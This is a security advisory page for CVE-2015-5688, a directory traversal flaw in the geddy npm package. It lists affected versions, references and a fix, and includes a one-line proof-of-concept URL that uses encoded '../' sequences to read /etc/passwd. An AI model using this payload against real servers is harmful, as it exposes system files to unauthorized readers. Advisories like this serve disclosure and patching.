CVE-2015-5688
EPSS 81.1%Directory Traversal in geddy
Published: 10/24/2017Modified: 11/8/2023
Description
Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors. ### Proof of Concept ``` http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd ``` ## Recommendation Update geddy to version >= 13.0.8
Affected packages (1)
- npm/geddyfrom 0, < 13.0.8
References (8)
- ADVISORYhttps://github.com/advisories/GHSA-333x-9vgq-v2j4
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2015-5688
- PATCHhttps://github.com/geddy/geddy
- WEBhttps://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
- WEBhttps://github.com/geddy/geddy/issues/697
- WEBhttps://github.com/geddy/geddy/pull/699
- WEBhttps://github.com/geddy/geddy/releases/tag/v13.0.8
- WEBhttps://www.npmjs.com/advisories/10